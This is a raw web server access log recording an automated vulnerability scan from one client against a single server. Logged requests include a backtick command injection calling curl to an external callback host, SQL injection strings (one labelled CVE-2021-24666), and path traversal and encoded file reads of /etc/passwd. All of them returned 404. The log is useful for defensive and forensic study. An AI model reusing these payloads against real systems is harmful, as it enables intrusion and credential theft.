2023-08-03 23:15:50 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//cj5gsq24749fn87ofdl0kkra7uauhiepb.oast.site+-H+'User-Agent%3a+QTyA05'%60 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 57 2023-08-03 23:20:04 103.153.214.94 POST /dologin.action - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 59 2023-08-03 23:25:44 103.153.214.94 GET /compliancepolicyelements.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 58 2023-08-03 23:26:52 103.153.214.94 GET /script/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 65 2023-08-03 23:26:59 103.153.214.94 GET /jenkins/script - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 77 2023-08-03 23:32:26 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 102 2023-08-03 23:37:17 103.153.214.94 GET /manage/fileDownloader sec=1 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 83 2023-08-03 23:37:58 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 80 2023-08-03 23:43:35 103.153.214.94 GET /+CSCOE+/session_password.html - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 11 0 63 2023-08-03 23:46:01 103.153.214.94 GET /wp-admin/admin-ajax.php action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 80 2023-08-03 23:46:09 103.153.214.94 GET /index.php rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 76 2023-08-03 23:50:51 103.153.214.94 GET /index.php option=com_jstore&controller=./../../../../../../../../etc/passwd%00 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 94 2023-08-03 23:52:04 103.153.214.94 GET /admin/login/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 82 2023-08-03 23:57:11 103.153.214.94 GET /device.rsp opt=user&cmd=list 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58